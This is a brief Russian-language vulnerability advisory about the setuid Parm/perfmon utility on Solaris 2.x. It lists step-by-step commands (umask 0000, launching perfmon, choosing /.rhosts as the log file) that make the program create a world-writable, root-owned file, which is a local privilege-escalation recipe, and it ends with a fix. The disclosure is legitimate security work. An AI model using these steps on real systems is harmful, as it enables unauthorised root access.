Parm — SunOS программа, которая отображает системную информацию не включенную в стандартный Solaris package. Уязвимость в программе позволяет создавать произвольные файлы с рут привилегиями.

Системы уязвимы:
Solaris 2.X

Пример:
$ whoami
loveyou
$ umask 0000
$ /opt/JSparm/bin/perfmon &

Выбираешь Logging -> Logging File
Выбираешь file path, который хочешь создать (например: /.rhosts)

Этот файл будет создан в считанные секунды:
-rw-rw-rw- 1 root loveyou 144 Mar 9 03:14 .rhost

Решение проблемы:
Удалить разрешение setuid. Патч просите у поставщика 🙂



Оставить мнение